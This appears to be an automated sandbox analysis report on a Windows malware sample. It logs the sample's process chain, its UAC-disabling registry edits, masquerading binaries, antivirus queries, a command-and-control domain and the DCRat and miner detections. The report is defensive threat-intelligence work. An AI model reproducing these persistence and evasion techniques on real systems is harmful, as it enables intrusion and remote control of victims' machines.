            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeAPI call chain: ExitProcess graph end nodegraph_3-24475
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B21F0 AttachConsole,IsDebuggerPresent,CoInitializeEx,_invalid_parameter_noinfo_noreturn,GetMessageW,TranslateMessage,DispatchMessageW,GetMessageW,CoUninitialize,_invalid_parameter_noinfo_noreturn,2_2_00007FF7605B21F0
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B33F0 SetWindowLongPtrW,LoadLibraryA,GetProcAddress,FreeLibrary,DefWindowProcW,GetWindowLongPtrW,2_2_00007FF7605B33F0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029753D mov eax, dword ptr fs:[00000030h]3_2_0029753D
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B6520 IsZoomed,#413,SetWindowTextW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetWindowPos,GetProcessHeap,HeapFree,#413,2_2_00007FF7605B6520
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess token adjusted: Debug
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess token adjusted: Debug
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess token adjusted: Debug
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess token adjusted: Debug
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess token adjusted: Debug
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess token adjusted: Debug
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BDD64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7605BDD64
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BE1DC SetUnhandledExceptionFilter,2_2_00007FF7605BE1DC
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BDFFC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7605BDFFC
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028F063 SetUnhandledExceptionFilter,3_2_0028F063
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0028F22B
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0029866F
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0028EF05
            Source: C:\msPortRefnetdhcp\componentWininto.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeProcess created: C:\Users\user\AppData\Local\Temp\ yberLoad.exe "C:\Users\user\AppData\Local\Temp\ yberLoad.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\MVPLoader.exe "C:\Users\user\AppData\Local\Temp\MVPLoader.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\CyberLoader.exe "C:\Users\user\AppData\Local\Temp\CyberLoader.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msPortRefnetdhcp\componentWininto.exe "C:\msPortRefnetdhcp\componentWininto.exe"Jump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: unknown unknown
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028ED5B cpuid 3_2_0028ED5B
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_0028A63C
            Source: C:\msPortRefnetdhcp\componentWininto.exeQueries volume information: C:\msPortRefnetdhcp\componentWininto.exe VolumeInformationJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeQueries volume information: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe VolumeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeQueries volume information: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe VolumeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeQueries volume information: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BDEE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00007FF7605BDEE0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027ACF5 GetVersionExW,3_2_0027ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disable UAC(promptonsecuredesktop)
            Source: C:\msPortRefnetdhcp\componentWininto.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
            Disables UAC (registry)
            Source: C:\msPortRefnetdhcp\componentWininto.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: WmiPrvSE.exe, 00000023.00000002.3065876347.000000001C093000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3298532991.000000001BFC5000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3501157747.000000001B8B6000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3630561089.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.00000000037C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1848295221.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1747518014.000000001341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: componentWininto.exe PID: 7352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8088, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8120, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 7896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 8044, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 2992, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 6112, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 4076, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.00000000037C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1848295221.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1747518014.000000001341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: componentWininto.exe PID: 7352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8088, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8120, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 7896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 8044, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 2992, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 6112, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 4076, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information12
            Scripting            		Valid Accounts241
            Windows Management Instrumentation            		12
            Scripting            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Bypass User Account Control            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory3
            File and Directory Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		11
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager57
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Scheduled Task/Job            		21
            Software Packing            		NTDS261
            Security Software Discovery            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Bypass User Account Control            		Cached Domain Credentials151
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431492 Sample: 4c6fK85tK7.exe Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 120 a0947291.xsph.ru 2->120 128 Found malware configuration 2->128 130 Antivirus detection for dropped file 2->130 132 Antivirus / Scanner detection for submitted sample 2->132 134 14 other signatures 2->134 13 4c6fK85tK7.exe 2 2->13         started        16 wscript.exe 2->16         started        19 zufsVvjyWcGfJF.exe 2->19         started        21 2 other processes 2->21 signatures3 process4 file5 110 C:\Users\user\AppData\Local\...\yberLoad.exe, PE32 13->110 dropped 23 yberLoad.exe 3 13->23         started        124 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->124 26 WmiPrvSE.exe 16->26         started        126 Multi AV Scanner detection for dropped file 19->126 signatures6 process7 dnsIp8 102 C:\Users\user\AppData\Local\...\MVPLoader.exe, PE32+ 23->102 dropped 104 C:\Users\user\AppData\...\CyberLoader.exe, PE32 23->104 dropped 30 CyberLoader.exe 3 7 23->30         started        34 MVPLoader.exe 23->34         started        122 a0947291.xsph.ru 141.8.194.74, 49736, 49743, 49744 SPRINTHOSTRU Russian Federation 26->122 106 e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs, ASCII 26->106 dropped 108 6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs, ASCII 26->108 dropped 148 Antivirus detection for dropped file 26->148 150 Multi AV Scanner detection for dropped file 26->150 152 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->152 154 Machine Learning detection for dropped file 26->154 36 wscript.exe 26->36         started        38 wscript.exe 26->38         started        file9 signatures10 process11 file12 116 C:\msPortRefnetdhcp\componentWininto.exe, PE32 30->116 dropped 118 C:\...\zRMFcMzN1094wnGdurNck4fGlt.vbe, data 30->118 dropped 158 Antivirus detection for dropped file 30->158 160 Multi AV Scanner detection for dropped file 30->160 162 Machine Learning detection for dropped file 30->162 40 wscript.exe 1 30->40         started        43 wscript.exe 30->43         started        45 WmiPrvSE.exe 36->45         started        signatures13 process14 file15 146 Windows Scripting host queries suspicious COM object (likely to drop second stage) 40->146 48 cmd.exe 1 40->48         started        112 d096c949-588b-4f62-9035-9022be100ad8.vbs, ASCII 45->112 dropped 114 1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs, ASCII 45->114 dropped 50 wscript.exe 45->50         started        52 wscript.exe 45->52         started        signatures16 process17 process18 54 componentWininto.exe 4 12 48->54         started        58 conhost.exe 48->58         started        60 WmiPrvSE.exe 50->60         started        file19 90 C:\Windows\...\zufsVvjyWcGfJF.exe, PE32 54->90 dropped 92 C:\Users\Default\Downloads\WmiPrvSE.exe, PE32 54->92 dropped 94 C:\Recovery\zufsVvjyWcGfJF.exe, PE32 54->94 dropped 96 C:\Users\user\AppData\...unsIO9tk2.bat, DOS 54->96 dropped 136 Antivirus detection for dropped file 54->136 138 Multi AV Scanner detection for dropped file 54->138 140 Machine Learning detection for dropped file 54->140 144 4 other signatures 54->144 62 cmd.exe 54->62         started        65 schtasks.exe 54->65         started        67 schtasks.exe 54->67         started        73 7 other processes 54->73 142 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 58->142 98 d365112d-c481-40f0-92bb-6621c11733c0.vbs, ASCII 60->98 dropped 100 c327c276-7051-4e25-8eb9-181648a7a409.vbs, ASCII 60->100 dropped 69 wscript.exe 60->69         started        71 wscript.exe 60->71         started        signatures20 process21 signatures22 156 Drops executables to the windows directory (C:\Windows) and starts them 62->156 75 conhost.exe 62->75         started        77 w32tm.exe 62->77         started        79 zufsVvjyWcGfJF.exe 62->79         started        81 conhost.exe 65->81         started        83 WmiPrvSE.exe 69->83         started        process23 file24 86 e9b737bd-75a6-4059-b77c-a41b4b38424b.vbs, ASCII 83->86 dropped 88 55dc47f4-7c66-4fb4-aa2a-4ea28e92c8cc.vbs, ASCII 83->88 dropped

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            4c6fK85tK7.exe97%ReversingLabsWin32.Trojan.DisguisedXMRigMiner
            4c6fK85tK7.exe85%VirustotalBrowse
            4c6fK85tK7.exe100%AviraVBS/Runner.VPG
            4c6fK85tK7.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Recovery\zufsVvjyWcGfJF.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat100%AviraBAT/Delbat.C
            C:\Users\user\AppData\Local\Temp\e9b737bd-75a6-4059-b77c-a41b4b38424b.vbs100%AviraVBS/Starter.VPVT
            C:\Users\user\AppData\Local\Temp\55dc47f4-7c66-4fb4-aa2a-4ea28e92c8cc.vbs100%AviraVBS/Runner.VPXJ
            C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs100%AviraVBS/Starter.VPVT
            C:\Recovery\zufsVvjyWcGfJF.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs100%AviraVBS/Runner.VPXJ
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe100%AviraVBS/Runner.VPG
            C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs100%AviraVBS/Runner.VPXJ
            C:\Users\Default\Downloads\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs100%AviraVBS/Runner.VPXJ
            C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs100%AviraVBS/Starter.VPVT
            C:\msPortRefnetdhcp\componentWininto.exe100%AviraHEUR/AGEN.1323984
            C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe100%AviraVBS/Runner.VPG
            C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs100%AviraVBS/Starter.VPVT
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe100%AviraVBS/Runner.VPG
            C:\Recovery\zufsVvjyWcGfJF.exe100%Joe Sandbox ML
            C:\Recovery\zufsVvjyWcGfJF.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe100%Joe Sandbox ML
            C:\Users\Default\Downloads\WmiPrvSE.exe100%Joe Sandbox ML
            C:\msPortRefnetdhcp\componentWininto.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe100%Joe Sandbox ML
            C:\Recovery\zufsVvjyWcGfJF.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\zufsVvjyWcGfJF.exe65%VirustotalBrowse
            C:\Users\Default\Downloads\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\Downloads\WmiPrvSE.exe65%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe96%ReversingLabsWin32.Trojan.DisguisedXMRigMiner
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe86%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe70%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe61%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\MVPLoader.exe0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MVPLoader.exe1%VirustotalBrowse
